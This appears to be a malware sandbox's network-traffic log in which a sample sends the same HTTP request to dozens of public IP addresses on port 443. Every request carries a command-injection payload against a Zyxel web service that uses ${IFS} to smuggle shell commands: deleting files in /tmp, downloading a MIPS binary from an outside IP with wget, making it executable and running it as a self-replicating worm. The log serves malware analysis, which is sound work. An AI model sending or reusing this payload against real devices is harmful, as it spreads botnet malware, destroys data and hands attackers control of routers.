                                        Mar 31, 2024 09:20:38.313983917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1501192.168.2.2336540185.70.169.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.314055920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1502192.168.2.2342446188.120.254.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.314090967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1503192.168.2.2355128219.190.145.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.314141989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1504192.168.2.234060494.31.175.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.314171076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1505192.168.2.2335320199.187.139.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.314222097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1506192.168.2.2342476120.191.231.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.314276934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1507192.168.2.2340882154.85.239.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.314312935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1508192.168.2.233313697.249.147.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.314364910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1509192.168.2.234041812.159.17.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.314418077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1510192.168.2.235792443.194.204.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.314450026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1511192.168.2.234542837.68.107.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.314512014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1512192.168.2.2337088208.29.176.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:38.314541101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1513192.168.2.234517676.0.229.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:39.318394899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1514192.168.2.2344448163.170.156.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:39.318424940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1515192.168.2.2360478160.140.77.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:39.318473101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1516192.168.2.234326632.210.245.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:39.318509102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1517192.168.2.2352796139.128.15.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:39.318546057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1518192.168.2.234455423.201.23.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:39.318595886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1519192.168.2.236011686.141.7.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:39.318660021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1520192.168.2.233686077.14.253.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:39.318687916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1521192.168.2.2342824218.116.232.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:39.318732023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1522192.168.2.233857685.166.154.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:39.318774939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1523192.168.2.2353650134.149.180.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:39.318814993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1524192.168.2.234104613.165.155.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:39.319113016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1525192.168.2.2342392201.198.182.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:39.319169998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1526192.168.2.2335794101.93.141.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.330714941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1527192.168.2.2359408220.89.126.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.330756903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1528192.168.2.2349034221.98.74.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.330796957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1529192.168.2.2351442164.72.34.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.330859900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1530192.168.2.235339220.250.242.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.330893040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1531192.168.2.2348148159.83.208.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.330936909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1532192.168.2.2359992155.97.74.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.330967903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1533192.168.2.23607782.153.170.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331027031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1534192.168.2.2359098189.193.92.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331059933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1535192.168.2.2335386149.21.156.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331111908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1536192.168.2.2346020115.60.172.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331139088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1537192.168.2.2340110172.188.56.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331187963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1538192.168.2.233367267.90.133.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331233978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1539192.168.2.233399689.229.16.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331268072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1540192.168.2.2358304146.214.228.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331315994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1541192.168.2.2335018212.56.96.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331352949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1542192.168.2.2353078149.85.95.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331388950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1543192.168.2.235453099.174.24.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331455946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1544192.168.2.2350754109.246.28.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331468105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1545192.168.2.233847675.88.184.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331522942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1546192.168.2.23553784.170.234.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331561089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1547192.168.2.2350510115.107.220.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331598043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1548192.168.2.2336818102.187.238.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331624985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1549192.168.2.23439845.222.65.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331681013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1550192.168.2.2354332164.20.94.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331712008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1551192.168.2.2344318123.243.8.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331749916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1552192.168.2.2349424210.115.191.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331799984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1553192.168.2.2336974114.114.219.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331845045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1554192.168.2.235863851.129.15.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331876040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1555192.168.2.235837857.38.143.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331912994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1556192.168.2.2343986205.1.186.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331940889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1557192.168.2.2346174160.109.31.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.331988096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1558192.168.2.2339292137.210.220.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332016945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1559192.168.2.2338908142.83.163.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332056046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1560192.168.2.2350364184.72.12.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332094908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1561192.168.2.2334732151.228.143.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332142115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1562192.168.2.234062448.91.255.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332184076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1563192.168.2.2340156134.144.32.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332231045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1564192.168.2.2335930153.120.100.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332268000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1565192.168.2.2356594170.225.56.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332312107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1566192.168.2.234151289.254.98.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332353115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1567192.168.2.235500076.47.111.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332384109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1568192.168.2.2346446101.16.237.103443
                                        TimestampBytes transferredDirectionData
